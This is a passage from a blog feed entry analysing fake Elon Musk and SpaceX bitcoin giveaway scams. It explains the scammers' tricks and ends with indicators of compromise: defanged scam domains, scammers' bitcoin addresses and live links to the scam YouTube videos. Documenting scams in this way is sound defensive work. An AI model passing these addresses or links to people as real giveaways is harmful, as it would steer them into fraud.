Some of them are:</span></p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">1Musk18ezNXyS1Am9WrYxdWbHnqNCPrAMb</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">1EMuskPyw1irYmZrXfy26mgATarN1bfwp7</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">1SpacexRRTziVHZqGzc6GzR76oQsZEc85</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">1Musk1hzEwBMB9aqv2rQqkJ4GjSUFMLK9U</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">1ELonMUSK14JSGNYAcPJNqubuFByZPyjcj</span></li>\n</ul>\n<p><span style=\"font-weight: 400;\">The “Musk”, “Spacex”, etc. prefixes at the beginning of the addresses boosted the victims' trust in them, and the victims took the bait. </span></p>\n<h3><span style=\"font-weight: 400;\">Attention to Detail</span></h3>\n<figure class=\"post__image\" ><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-10.png\" alt=\"\" width=\"1505\" height=\"571\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-10-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-10-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-10-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-10-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-10-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-10-2xl.png 1600w\">\n<figcaption ><span style=\"font-weight: 400;\">https://spacex-btc.net/#</span></figcaption>\n</figure>\n<p><span style=\"font-weight: 400;\">The attackers kept a live loop of fake transactions at the bottom of the page. They were meticulous enough to make each outgoing transaction 2X the incoming one, 
giving the victims the impression that previous participants had received their rewards.</span></p>\n<h3><span style=\"font-weight: 400;\">Sense of Urgency</span></h3>\n<figure class=\"post__image\" ><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-9.png\" alt=\"\" width=\"849\" height=\"194\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-9-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-9-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-9-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-9-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-9-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-9-2xl.png 1600w\">\n<figcaption ><span style=\"font-weight: 400;\">https://spacex-btc.net/#</span></figcaption>\n</figure>\n<p><span style=\"font-weight: 400;\">The countdown bar, supposedly showing how much bitcoin is left in the giveaway, creates a sense of urgency, a useful tool for the attackers: the victims were prompted to act fast before the bitcoin ran out, and so they acted without thinking it through.</span></p>\n<p><span style=\"font-weight: 400;\">At the time of writing, the total amount of money these attacks stole is well over $150K. It was predicted that these types of attacks </span><span style=\"color: #3598db;\"><a href=\"https://www.phishfort.com/blog/binance-free-giveaway-scam-analysis\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">will continue to increase in frequency</span></a></span><span style=\"font-weight: 400;\">. 
</span></p>\n<h2><span style=\"font-weight: 400;\">Protecting yourself online</span></h2>\n<p><span style=\"font-weight: 400;\">To learn how to protect yourself from scams like these, read this blog post on </span><span style=\"color: #3598db;\"><a href=\"https://www.phishfort.com/blog/staying-safe-online\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">How to Spot Phishing Attacks</span></a></span><span style=\"font-weight: 400;\">.</span></p>\n<p><span style=\"color: #3598db;\"><a href=\"https://www.phishfort.com/protect\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">PhishFort Protect Browser Extension</span></a></span></p>\n<h2><span style=\"font-weight: 400;\">Indicators of Compromise</span></h2>\n<h3><span style=\"font-weight: 400;\">Domains</span></h3>\n<p><span style=\"font-weight: 400;\">spacex-tesla[.]me</span></p>\n<p><span style=\"font-weight: 400;\">spacex[.]money</span></p>\n<p><span style=\"font-weight: 400;\">spacex-btc[.]net</span></p>\n<p><span style=\"font-weight: 400;\">spacex-btc[.]info</span></p>\n<p><span style=\"font-weight: 400;\">spacex-btc[.]com</span></p>\n<p><span style=\"font-weight: 400;\">spacex-btc[.]live</span></p>\n<p><span style=\"font-weight: 400;\">spaceufx[.]site</span></p>\n<p><span style=\"font-weight: 400;\">btcspacex[.]com</span></p>\n<p><span style=\"font-weight: 400;\">officialelonmusk[.]com</span></p>\n<p><span style=\"font-weight: 400;\">elonmusckbtc[.]com</span></p>\n<p><span style=\"font-weight: 400;\">teslagain[.]com</span></p>\n<p><span style=\"font-weight: 400;\">spacexbitcoins[.]com</span></p>\n<p><span style=\"font-weight: 400;\">spacexdrop[.]info</span></p>\n<p><span style=\"font-weight: 400;\">tesla-giveaway[.]getforge[.]io</span></p>\n<p><span style=\"font-weight: 400;\">spacetesla[.]info</span></p>\n<p><span style=\"font-weight: 400;\">teslagives[.]info</span></p>\n<p><span style=\"font-weight: 400;\">bonustesla[.]com</span></p>\n<p><span style=\"font-weight: 400;\">teslaearn[.]com</span></p>\n<p><span style=\"font-weight: 
400;\">teslabtc[.]live</span></p>\n<h3><span style=\"font-weight: 400;\">Bitcoin Addresses</span></h3>\n<p><span style=\"font-weight: 400;\">1SpacexRRTziVHZqGzc6GzR76oQsZEc85</span></p>\n<p><span style=\"font-weight: 400;\">1Musk1hzEwBMB9aqv2rQqkJ4GjSUFMLK9U</span></p>\n<p><span style=\"font-weight: 400;\">18PBHxS9q62KpKUrxu6Ss7AKjUn1W11PRc</span></p>\n<p><span style=\"font-weight: 400;\">1ELonMUSK14JSGNYAcPJNqubuFByZPyjcj</span></p>\n<p><span style=\"font-weight: 400;\">1GwMM8uSPgX15Z58bVu5AdoFK9HE3rfaVL</span></p>\n<p><span style=\"font-weight: 400;\">18W11awT6UHMgnAMCqTtrcj2GYV662HY5V</span></p>\n<p><span style=\"font-weight: 400;\">1B2U5swpSH6hmboFWrbfwZK1c84horiJeT</span></p>\n<p><span style=\"font-weight: 400;\">12wV4uEvFcVZgKbH34vQgfU6Gh2rt6XyRt</span></p>\n<p><span style=\"font-weight: 400;\">15mt8E5RTGHuhYtJAg12HkccTxnVBTxqpM</span></p>\n<p><span style=\"font-weight: 400;\">1TESLAYDMZUGQuxFNWP8nkwvSj7p1juHh</span></p>\n<h3><span style=\"font-weight: 400;\">YouTube channels</span></h3>\n<p><span style=\"color: #3598db;\"><a href=\"https://www.youtube.com/watch?v=vXVs-o3darI\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">Interview with Elon Musk (Exclusive Interview)</span></a></span></p>\n<p><span style=\"color: #3598db;\"><a href=\"https://www.youtube.com/watch?v=xTnxLw3p9Mw\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">🔷Elon Musk Live/ Bitcoin BTC Talk BTC Mass Adoption & SpaceX update [4 May, 20</span></a></span></p>\n<p><span style=\"color: #3598db;\"><a href=\"https://www.youtube.com/watch?v=r-zgh2bP--k\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">🔷Elon Musk Live/ Bitcoin BTC Talk BTC Mass Adoption & SpaceX update [4 May, 20</span></a></span></p>\n<p><span style=\"color: #3598db;\"><a href=\"https://www.youtube.com/watch?v=TmRKPVOM7XI\" 
style=\"color: #3598db;\"><span style=\"font-weight: 400;\">Elon Musk Live: Bitcoin Talk & SpaceX update [May, 2020]</span></a></span></p>\n<p><span style=\"color: #3598db;\"><a href=\"https://www.youtube.com/watch?v=8hSl4kgO5o4\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">Elon Musk Interview (Special)</span></a></span></p>\n<p><span style=\"color: #3598db;\"><a href=\"https://www.youtube.com/watch?v=1657gqaL4GY\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">Elon Musk Interview: Exclusive</span></a></span></p>\n<p><span style=\"color: #3598db;\"><a href=\"https://www.youtube.com/watch?v=mPoL3JIkwBw\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">Elon Musk Officially Confirms BTC Giveaway (Check Description)</span></a></span></p>",
"image": "https://blog.syncpundit.io/media/posts/1/unnamed-2-2.png",
"author": {
"name": "Sync_Pundit"
},
"tags": [
"Research"
],
"date_published": "2020-06-15T07:28:00+02:00",
"date_modified": "2021-09-20T20:02:34+02:00"
}
]
}